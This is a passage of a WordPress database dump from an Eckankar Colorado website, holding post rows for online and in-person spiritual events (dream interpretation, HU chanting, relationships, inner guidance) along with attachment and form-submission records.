14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Click below to register for this event.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284354757/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','ONLINE - 12 Gifts of Spiritual Living: Spiritual Exercises','','publish','closed','closed','','online-12-gifts-of-spiritual-living-spiritual-exercises','','','2022-03-03 17:17:28','2022-03-04 00:17:28','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266320',0,'mec-events','',0),(266321,15,'2022-03-03 08:22:21','2022-03-03 15:22:21','','SpiritualExercises','','inherit','closed','closed','','spiritualexercises','','','2022-03-03 08:22:21','2022-03-03 15:22:21','',266320,'https://eckankar-colorado.org/wp-content/uploads/2022/03/SpiritualExercises.webp',0,'attachment','image/webp',0),(266324,0,'2022-03-05 10:04:51','2022-03-05 17:04:51','','','','publish','closed','closed','','266324','','','2022-03-05 10:04:51','2022-03-05 17:04:51','',0,'https://eckankar-colorado.org/nf_sub/266324/',0,'nf_sub','',0),(266333,0,'2022-03-05 19:24:35','2022-03-06 02:24:35','','','','publish','closed','closed','','266333','','','2022-03-05 19:24:35','2022-03-06 02:24:35','',0,'https://eckankar-colorado.org/nf_sub/266333/',0,'nf_sub','',0),(266334,0,'2022-03-05 21:51:25','2022-03-06 04:51:25','','','','publish','closed','closed','','266334','','','2022-03-05 21:51:25','2022-03-06 04:51:25','',0,'https://eckankar-colorado.org/nf_sub/266334/',0,'nf_sub','',0),(266335,0,'2022-03-06 12:11:09','2022-03-06 19:11:09','','','','publish','closed','closed','','266335','','','2022-03-06 12:11:09','2022-03-06 19:11:09','',0,'https://eckankar-colorado.org/nf_sub/266335/',0,'nf_sub','',0),(266340,2,'2022-03-06 15:24:18','2022-03-06 22:24:18','','Temple Gallery','','publish','closed','closed','','temple-gallery','','','2022-03-06 15:25:54','2022-03-06 22:25:54','',0,'https://eckankar-colorado.org/?post_type=modula-gallery&#038;p=266340',0,'modula-gallery','',0),(266341,2,'2022-03-06 15:28:09','2022-03-06 22:28:09','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>[modula id=\"266340\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Temple Gallery','','publish','closed','closed','','temple-gallery','','','2022-03-06 15:29:56','2022-03-06 22:29:56','',0,'https://eckankar-colorado.org/?page_id=266341',0,'page','',0),(266343,2,'2022-03-06 15:28:09','2022-03-06 22:28:09',' ','','','publish','closed','closed','','266343','','','2022-03-06 15:28:09','2022-03-06 22:28:09','',0,'https://eckankar-colorado.org/266343/',27,'nav_menu_item','',0),(266352,0,'2022-03-08 14:18:23','2022-03-08 21:18:23','','','','publish','closed','closed','','266352','','','2022-03-08 14:18:23','2022-03-08 21:18:23','',0,'https://eckankar-colorado.org/nf_sub/266352/',0,'nf_sub','',0),(266354,15,'2022-03-08 17:18:56','2022-03-09 00:18:56','<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Would you like to better understand and learn from your dreams?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember your dreams?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Do you want to explore the spiritual nature of dreams?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Dreams can be a window to our inner experiences. These can include practical help in everyday life; spiritual growth; researching past lives; and reuniting with departed loved ones. Oftentimes the dream makes no sense. But when revisited later, its spiritual significance unfolds.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss tips for dream discovery, recovery, and interpretation. Your dream meaning can be disguised using its own unique symbols. You can create your own dream dictionary to learn the meaning of the symbols to you. Do your dream symbols change? Learn what that means. We will go over dream interpretation on how it affects you on several levels – how it affects your daily life; going through emotional experiences; or dreams involved with your relationship with Divine Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others who are working with understanding the meaning of their dreams. Share your experiences, listen to others and ask questions during this online event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about dreams visit the <a class=\"link\" href=\"https://www.eckankar.org/experience/dreams\" target=\"_blank\" rel=\"noopener\">Spiritual Nature of Dreams</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284488466/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','ONLINE - Discover The Meaning of Your Dreams','','publish','closed','closed','','online-discover-the-meaning-of-your-dreams','','','2022-03-08 17:24:03','2022-03-09 00:24:03','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266354',0,'mec-events','',0),(266355,15,'2022-03-08 17:14:19','2022-03-09 00:14:19','','Dreams','','inherit','closed','closed','','dreams','','','2022-03-08 17:14:19','2022-03-09 00:14:19','',266354,'https://eckankar-colorado.org/wp-content/uploads/2022/03/Dreams.webp',0,'attachment','image/webp',0),(266356,15,'2022-03-08 17:22:21','2022-03-09 00:22:21','<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Would you like to better understand and learn from your dreams?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember your dreams?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Do you want to explore the spiritual nature of dreams?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Dreams can be a window to our inner experiences. These can include practical help in everyday life; spiritual growth; researching past lives; and reuniting with departed loved ones. Oftentimes the dream makes no sense. But when revisited later, its spiritual significance unfolds.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss tips for dream discovery, recovery, and interpretation. Your dream meaning can be disguised using its own unique symbols. You can create your own dream dictionary to learn the meaning of the symbols to you. Do your dream symbols change? Learn what that means. We will go over dream interpretation on how it affects you on several levels – how it affects your daily life; going through emotional experiences; or dreams involved with your relationship with Divine Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others who are working with understanding the meaning of their dreams. Share your experiences, listen to others and ask questions during this online event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about dreams visit the <a class=\"link\" href=\"https://www.eckankar.org/experience/dreams\" target=\"_blank\" rel=\"noopener\">Spiritual Nature of Dreams</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284488462/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','ONLINE - Discover The Meaning of Your Dreams','','publish','closed','closed','','online-discover-the-meaning-of-your-dreams-2','','','2022-03-08 17:22:45','2022-03-09 00:22:45','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266356',0,'mec-events','',0),(266359,0,'2022-03-10 14:52:43','2022-03-10 21:52:43','','','','publish','closed','closed','','266359','','','2022-03-10 14:52:43','2022-03-10 21:52:43','',0,'https://eckankar-colorado.org/nf_sub/266359/',0,'nf_sub','',0),(266360,0,'2022-03-12 05:54:32','2022-03-12 12:54:32','','','','publish','closed','closed','','266360','','','2022-03-12 05:54:32','2022-03-12 12:54:32','',0,'https://eckankar-colorado.org/nf_sub/266360/',0,'nf_sub','',0),(266361,0,'2022-03-12 07:17:46','2022-03-12 14:17:46','','','','publish','closed','closed','','266361','','','2022-03-12 07:17:46','2022-03-12 14:17:46','',0,'https://eckankar-colorado.org/nf_sub/266361/',0,'nf_sub','',0),(266362,0,'2022-03-12 15:38:46','2022-03-12 22:38:46','','','','publish','closed','closed','','266362','','','2022-03-12 15:38:46','2022-03-12 22:38:46','',0,'https://eckankar-colorado.org/nf_sub/266362/',0,'nf_sub','',0),(266363,0,'2022-03-13 09:47:30','2022-03-13 15:47:30','','','','publish','closed','closed','','266363','','','2022-03-13 09:47:30','2022-03-13 15:47:30','',0,'https://eckankar-colorado.org/nf_sub/266363/',0,'nf_sub','',0),(266364,0,'2022-03-13 10:03:34','2022-03-13 16:03:34','','','','publish','closed','closed','','266364','','','2022-03-13 10:03:34','2022-03-13 16:03:34','',0,'https://eckankar-colorado.org/nf_sub/266364/',0,'nf_sub','',0),(266365,0,'2022-03-13 10:20:57','2022-03-13 16:20:57','','','','publish','closed','closed','','266365','','','2022-03-13 10:20:57','2022-03-13 16:20:57','',0,'https://eckankar-colorado.org/nf_sub/266365/',0,'nf_sub','',0),(266366,0,'2022-03-13 11:14:48','2022-03-13 17:14:48','','','','publish','closed','closed','','266366','','','2022-03-13 11:14:48','2022-03-13 17:14:48','',0,'https://eckankar-colorado.org/nf_sub/266366/',0,'nf_sub','',0),(266367,0,'2022-03-14 14:49:36','2022-03-14 20:49:36','','','','publish','closed','closed','','266367','','','2022-03-14 14:49:36','2022-03-14 20:49:36','',0,'https://eckankar-colorado.org/nf_sub/266367/',0,'nf_sub','',0),(266368,15,'2022-03-14 18:06:10','2022-03-15 00:06:10','<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What is the secret of all relationships?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Could it be something simple?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Why do we have problems with some and not with others?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Everyone has some experience with love – even a child who has a pet kitten or a dog. We are trying to give back or respond to God’s love that is coming through. In some way, the child learns lessons about caring for the pet. If he neglects the pet and it runs away, the child learns lessons about love. If you love something, you have to nurture it.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">During this in-person discussion, you will learn techniques and inspiration to find greater happiness, discover your bond of love with all life, become more aware of how past lives affect our relationships today, and experience a technique that can help bring understanding, peace, and love into your life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to join us for a very creative and lively discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom. People of all faiths and beliefs are welcome.</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br />\r\n**</strong> <em>We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p>&nbsp;</p>','Pagosa Springs - IN PERSON <br>The Secret of All Relationships','','publish','closed','closed','','pagosa-springs-in-person-the-secret-of-all-relationships','','','2022-03-14 18:06:10','2022-03-15 00:06:10','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266368',0,'mec-events','',0),(266369,15,'2022-03-14 18:02:51','2022-03-15 00:02:51','','Relationships','','inherit','closed','closed','','relationships','','','2022-03-14 18:02:51','2022-03-15 00:02:51','',266368,'https://eckankar-colorado.org/wp-content/uploads/2022/03/Relationships.webp',0,'attachment','image/webp',0),(266370,0,'2022-03-15 09:20:11','2022-03-15 15:20:11','','','','publish','closed','closed','','266370','','','2022-03-15 09:20:11','2022-03-15 15:20:11','',0,'https://eckankar-colorado.org/nf_sub/266370/',0,'nf_sub','',0),(266371,15,'2022-03-15 17:39:31','2022-03-15 23:39:31','<div class=\"emrv9za\">\r\n<div class=\"px-6 sm:px-4 xl:px-0 md:max-w-screen w-full mt-5\">\r\n<div class=\"break-words\">\r\n<p><strong><span style=\"font-size: 14pt;\">How do you recognize the voice of your own Inner Guidance?</span></strong></p>\r\n<p><strong><span style=\"font-size: 14pt;\">What are some of the tools you use to navigate daily challenges?</span></strong></p>\r\n<p><strong><span style=\"font-size: 14pt;\">Once you’ve chosen your next step, how do you act on it?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are welcome to join us and discover what others have learned as they face the ongoing challenges of life. We will share tools that can help you hear your own Inner Guidance, and ways to access it daily, in every moment.</span></p>\r\n<blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Often people are afraid to follow their inner guidance. It sounds like such a foolish thing to do, especially if they have to face other people and explain why they are doing what they are doing. One of the very strong pressures in life is the social consciousness: What will people think? What will people say?”<br />\r\n—Harold Klemp, <em>ECK Wisdom on Inner Guidance</em>, p. 5</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283430880/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','ONLINE - Following Your Inner Guidance','','publish','closed','closed','','online-following-your-inner-guidance','','','2022-03-15 21:15:52','2022-03-16 03:15:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266371',0,'mec-events','',0),(266372,15,'2022-03-15 17:56:57','2022-03-15 23:56:57','<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Inner peace and calm</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">Divine love</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">Expanded awareness</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">Healing of the heart</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by discussion groups, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\"> </span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br />\r\n**</strong> <em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p>&nbsp;</p>','IN PERSON - Experience The Sound of Soul: HU','','publish','closed','closed','','in-person-experience-the-sound-of-soul-hu','','','2022-03-15 17:56:57','2022-03-15 23:56:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266372',0,'mec-events','',0),(266373,15,'2022-03-15 17:55:15','2022-03-15 23:55:15','','GoldenHU','','inherit','closed','closed','','goldenhu','','','2022-03-15 17:55:15','2022-03-15 23:55:15','',266372,'https://eckankar-colorado.org/wp-content/uploads/2022/03/GoldenHU.webp',0,'attachment','image/webp',0),(266375,15,'2022-03-15 18:45:33','2022-03-16 00:45:33','<p class=\"description-markdown--p\"><strong><span style=\"font-size: 14pt;\">Do you wonder why you are here?</span></strong></p>\r\n<p class=\"description-markdown--p\"><strong><span style=\"font-size: 14pt;\">What gives your life meaning and purpose?</span></strong></p>\r\n<p class=\"description-markdown--p\"><strong><span style=\"font-size: 14pt;\">How do you meet the daily challenges of life?</span></strong></p>\r\n<p class=\"description-markdown--p\"><span style=\"font-size: 14pt;\">This ECK Light &amp; Sound Service will give you insights into your own purpose and that will help you tap into your divine nature. It will include personal stories and techniques that can help you in your daily life.</span></p>\r\n<p class=\"description-markdown--p\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>Is Life a Random Walk?</em>:</span></p>\r\n<blockquote>\r\n<p class=\"description-markdown--p\"><span style=\"font-size: 14pt;\">\"All in all, earth is a spiritual school. Designed and set up by God, it lets each of us, each Soul in this world, learn more about becoming godlike—becoming more like God.</span><br />\r\n<span style=\"font-size: 14pt;\">The whole purpose of you, me, and everyone else is to become more godlike. It is our mission, or purpose, here. It’s the key to happiness.\"</span></p>\r\n</blockquote>\r\n<p class=\"description-markdown--p\"><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"description-markdown--p\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p>[ninja_form id=46]</p>','ONLINE - ECK Light and Sound Service<br>\'Is Life a Random Walk\'','','publish','closed','closed','','online-eck-light-and-sound-serviceis-life-a-random-walk','','','2022-03-15 18:45:33','2022-03-16 00:45:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266375',0,'mec-events','',0),(266377,15,'2022-03-15 18:07:31','2022-03-16 00:07:31','','RandomWalk','','inherit','closed','closed','','randomwalk','','','2022-03-15 18:07:31','2022-03-16 00:07:31','',266375,'https://eckankar-colorado.org/wp-content/uploads/2022/03/RandomWalk.html',0,'attachment','text/html',0),(266378,15,'2022-03-15 18:43:42','2022-03-16 00:43:42','','RandomWalk','','inherit','closed','closed','','randomwalk-2','','','2022-03-15 18:43:42','2022-03-16 00:43:42','',266375,'https://eckankar-colorado.org/wp-content/uploads/2022/03/RandomWalk.png',0,'attachment','image/png',0),(266380,0,'2022-03-16 18:38:01','2022-03-17 00:38:01','','','','publish','closed','closed','','266380','','','2022-03-16 18:38:01','2022-03-17 00:38:01','',0,'https://eckankar-colorado.org/nf_sub/266380/',0,'nf_sub','',0),(266381,0,'2022-03-16 18:39:40','2022-03-17 00:39:40','','','','publish','closed','closed','','266381','','','2022-03-16 18:39:40','2022-03-17 00:39:40','',0,'https://eckankar-colorado.org/nf_sub/266381/',0,'nf_sub','',0),(266382,0,'2022-03-17 17:39:30','2022-03-17 23:39:30','','','','publish','closed','closed','','266382','','','2022-03-17 17:39:30','2022-03-17 23:39:30','',0,'https://eckankar-colorado.org/nf_sub/266382/',0,'nf_sub','',0),(266383,0,'2022-03-19 11:50:38','2022-03-19 17:50:38','','','','publish','closed','closed','','266383','','','2022-03-19 11:50:38','2022-03-19 17:50:38','',0,'https://eckankar-colorado.org/nf_sub/266383/',0,'nf_sub','',0),(266396,2,'2022-03-22 09:46:21','2022-03-22 15:46:21','<p class=\"mb-4\"><strong><span style=\"color: #333333;\"><span style=\"font-size: 16pt;\">I ask: What does my life mean? How do I follow my heart and where will it take me?</span></span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"color: #333333;\"><span style=\"font-size: 16pt;\">I seek the answers in my many experiences--some joyful, some extremely difficult, and a variety of others.</span></span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In ECKANKAR, the path of spiritual freedom, I have spiritual tools that help me on my quest to find my heart’s true north.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The spiritual leader of ECKANKAR, Harold Klemp, says:</span><span style=\"font-size: 14pt;\"></span><span style=\"font-size: 14pt;\"></span><span style=\"font-size: 14pt;\"> </span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #1d5791; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">Imagination is the creative spark within us. It is that God faculty which we use in finding our way back to God.</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— How to Find God,<em> Mahanta Transcripts</em>, Book 2, p. 50<br />\r\n</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">I warmly invite you to this open discussion about listening to your heart and exercising your imagination as you walk this journey of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will use a brief spiritual exercise to help us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Lone-Tree/events/284778329/?_xtd=gatlbWFpbF9jbGlja9oAJGUwYWFhMzZhLWIzYjQtNDI5Zi1hY2RhLTQ2NzBlMDU1NTEyYw&amp;utm_campaign=rsvp-confirmation&amp;_af=event&amp;_af_eid=284778329&amp;utm_medium=email&amp;utm_source=join_rsvp_info\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Your Heart Knows the Way\'<br>(An ECKANKAR Perspective)','','publish','closed','closed','','online-meetup-your-heart-knows-the-wayan-eckankar-perspective','','','2022-03-22 10:09:47','2022-03-22 16:09:47','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266396',0,'mec-events','',0),(266397,2,'2022-03-22 09:44:15','2022-03-22 15:44:15','','spring-flowers-4','','inherit','closed','closed','','spring-flowers-4','','','2022-03-22 09:44:15','2022-03-22 15:44:15','',266396,'https://eckankar-colorado.org/wp-content/uploads/2022/03/spring-flowers-4.jpg',0,'attachment','image/jpeg',0),(266399,2,'2022-03-22 19:36:29','2022-03-23 01:36:29','<blockquote class=\"bg-blockquote border\" style=\"border-color: #1d5791; margin-top: -15px; margin-left: 20px;\"><span style=\"font-size: 18pt;\">“As Soul, you owe yourself the experience of going out in life and getting the richest, fullest experiences you can.”</span><br />\r\n<br />\r\n<p><span style=\"font-size: 14pt; color: #666666;\">— Harold Klemp, from<em> Touching the Face of God</em>, p. 12</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to this spiritual discussion where we will be sharing our experiences of living the Spiritual Adventure. We will discuss how Spiritual experiences show up in subtle and sometimes life changing ways every day. And, by noticing the inner guidance, miraculous coincidences, intuitions and waves of divine love as they arrive, we can experience the Spiritual Adventure of it all.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Exploring new possibilities to advance your life is your divine right as Soul. You can check out <a href=\"https://www.eckankar.org/heros-journey/\" target=\"_blank\" rel=\"noopener\">The Hero’s Journey</a> for inspiration.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more visit <a href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"noopener\">ECKANKAR</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284788069/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Living Life as a Spiritual Adventure\'','','publish','closed','closed','','online-meetupliving-life-as-a-spiritual-adventure','','','2022-03-22 19:46:03','2022-03-23 01:46:03','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266399',0,'mec-events','',0),(266400,2,'2022-03-22 19:32:06','2022-03-23 01:32:06','','open-doorway-1','','inherit','closed','closed','','open-doorway-1','','','2022-03-22 19:32:06','2022-03-23 01:32:06','',266399,'https://eckankar-colorado.org/wp-content/uploads/2022/03/open-doorway-1.jpg',0,'attachment','image/jpeg',0),(266402,2,'2022-03-22 19:43:41','2022-03-23 01:43:41','<blockquote class=\"bg-blockquote border\" style=\"border-color: #1d5791; margin-top: -15px; margin-left: 20px;\"><span style=\"font-size: 18pt;\">“As Soul, you owe yourself the experience of going out in life and getting the richest, fullest experiences you can.”</span><br />\r\n<br />\r\n<p><span style=\"font-size: 14pt; color: #666666;\">— Harold Klemp, from<em> Touching the Face of God</em>, p. 12</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to this spiritual discussion where we will be sharing our experiences of living the Spiritual Adventure. We will discuss how Spiritual experiences show up in subtle and sometimes life changing ways every day. And, by noticing the inner guidance, miraculous coincidences, intuitions and waves of divine love as they arrive, we can experience the Spiritual Adventure of it all.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Exploring new possibilities to advance your life is your divine right as Soul. You can check out <a href=\"https://www.eckankar.org/heros-journey/\" target=\"_blank\" rel=\"noopener\">The Hero’s Journey</a> for inspiration.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more visit <a href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"noopener\">ECKANKAR</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284788069/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Living Life as a Spiritual Adventure\'','','publish','closed','closed','','online-meetup-living-life-as-a-spiritual-adventure','','','2022-03-22 19:45:19','2022-03-23 01:45:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266402',0,'mec-events','',0),(266405,2,'2022-03-23 14:59:35','2022-03-23 20:59:35','<p><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Listen or share your spiritual experiences, insights, and questions in a relaxed atmosphere.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome. </span><span style=\"font-size: 14pt;\">Come and enjoy spending time with like-minded people.<br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br />\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>','IN PERSON - Roundtable Discussion<br>\'How God’s Love Works for Us\'','','publish','closed','closed','','in-person-roundtable-discussionhow-gods-love-works-for-us','','','2022-03-24 09:40:40','2022-03-24 15:40:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266405',0,'mec-events','',0),(266407,2,'2022-03-23 21:27:05','2022-03-24 03:27:05','<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">Find the answers to common questions of the heart, including the truth about soul mates, how to strengthen a marriage, and how to know if a partnership is worth developing.</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 15pt;\">You will discover:</span></strong><br />\r\n<span style=\"font-size: 14pt;\"></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">• The source of love</span><br />\r\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br />\r\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br />\r\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br />\r\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this open discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the first of 3 discussions that dig deeper into the topic each time.</span><br />\r\n<span style=\"font-size: 14pt;\">Join us for one or all of these lively discussions about the spiritual side of relationships.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\'<em>Spiritual Wisdom on Relationships</em>\' is a booklet which is available at <a class=\"link\" 